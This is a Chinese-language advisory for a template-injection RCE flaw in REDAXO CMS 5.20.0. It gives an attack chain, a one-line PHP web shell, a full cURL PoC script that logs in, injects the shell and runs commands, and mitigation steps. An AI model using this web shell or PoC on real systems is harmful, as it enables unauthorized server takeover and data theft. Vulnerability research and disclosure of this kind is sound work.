CVE-2025-64050 REDAXO CMS 5.20.0 模板注入远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-64050

漏洞类型

远程代码执行(RCE)

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

REDAXO CMS

漏洞概述

REDAXO CMS 5.20.0版本中存在一个严重的远程代码执行漏洞，位于模板管理组件中。该漏洞允许经过身份验证的远程管理员用户在活动模板中注入恶意PHP代码。当网站访问者访问使用该被入侵模板的前端页面时，注入的恶意代码会被服务器执行，从而实现任意操作系统命令的执行。攻击者可以利用此漏洞完全控制目标服务器，窃取敏感数据、安装后门、横向移动或对系统造成进一步破坏。由于该漏洞需要管理员权限，攻击者首先需要获取有效的管理员凭证，但一旦获得访问权限，即可轻松利用此漏洞实现服务器完全接管。CVSS 3.1评分7.2，属于高危漏洞，强烈建议立即采取修复措施。

技术细节

该漏洞的根本原因在于REDAXO CMS的模板管理功能对用户输入缺乏充分的过滤和验证。攻击者（具有管理员权限）可以：1) 访问模板管理界面；2) 选择要编辑的活动模板；3) 在模板内容中注入恶意PHP代码，例如：<?php system($_GET['cmd']); ?>；4) 保存修改后的模板；5) 当普通用户访问使用该模板的前端页面时，服务器会解析并执行注入的PHP代码。由于模板在页面渲染时被动态解析，恶意代码获得了与Web服务器相同的执行权限。攻击者可以通过URL参数传递系统命令，如：/index.php?cmd=whoami，从而在服务器上执行任意操作系统命令。漏洞的利用条件为攻击者必须拥有管理员账户，但一旦获得访问权限，攻击门槛极低且影响范围广泛。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的REDAXO CMS版本，确认版本为5.20.0或存在漏洞的早期版本

STEP 2

步骤2: 获取管理员访问权限

通过暴力破解、社会工程、凭证填充或其他方式获取有效的REDAXO CMS管理员账户凭据

STEP 3

步骤3: 访问模板管理界面

使用获取的管理员凭证登录REDAXO CMS后台，导航至模板管理模块

STEP 4

步骤4: 注入恶意PHP代码

在模板编辑器中修改活动模板内容，插入恶意PHP代码，如：<?php system($_GET['cmd']); ?>

STEP 5

步骤5: 保存并触发漏洞

保存修改后的模板，当网站访问者访问使用该模板的前端页面时，服务器解析并执行恶意代码

STEP 6

步骤6: 执行远程命令

通过构造特定的HTTP请求携带命令参数（如?cmd=whoami），在目标服务器上执行任意操作系统命令

STEP 7

步骤7: 持久化控制

攻击者可进一步安装后门、窃取数据或横向移动至其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
// CVE-2025-64050 PoC - REDAXO CMS Template Injection RCE
// Requirements: Valid administrator credentials

$target = 'http://target-site.com';
$username = 'admin';
$password = 'admin123';

// Step 1: Login to REDAXO CMS
$loginUrl = $target . '/redaxo/index.php';
$loginData = [
    'login' => $username,
    'password' => $password,
    'form' => 'login',
    'redirect' => ''
];

echo "[*] Logging in as administrator...\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $loginUrl);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($loginData));
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Inject PHP payload into active template
$templateUrl = $target . '/redaxo/index.php?page=template';
$maliciousPayload = '<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>';
$templateData = [
    'template_content' => $maliciousPayload,
    'save' => '1'
];

echo "[*] Injecting malicious PHP code into template...\n";
curl_setopt($ch, CURLOPT_URL, $templateUrl);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($templateData));
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
$response = curl_exec($ch);

// Step 3: Execute commands via injected payload
echo "[*] Executing command on target...\n";
$exploitUrl = $target . '/index.php?cmd=whoami';
curl_setopt($ch, CURLOPT_URL, $exploitUrl);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);

echo "[+] Command output: " . $result . "\n";
curl_close($ch);
?>

影响范围

REDAXO CMS 5.20.0

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 立即更改所有管理员账户密码并启用双因素认证；2) 限制模板管理界面的网络访问，仅允许受信任的IP地址段访问；3) 实施严格的访问控制列表(ACL)限制后台管理功能；4) 部署Web应用防火墙规则阻止包含可疑PHP代码的请求；5) 定期检查所有模板文件是否被篡改，比对文件哈希值；6) 监控服务器日志，关注异常的请求模式；7) 考虑暂时禁用模板在线编辑功能，改为通过文件系统直接管理模板；8) 实施入侵检测系统(IDS)监控可疑的系统命令执行行为。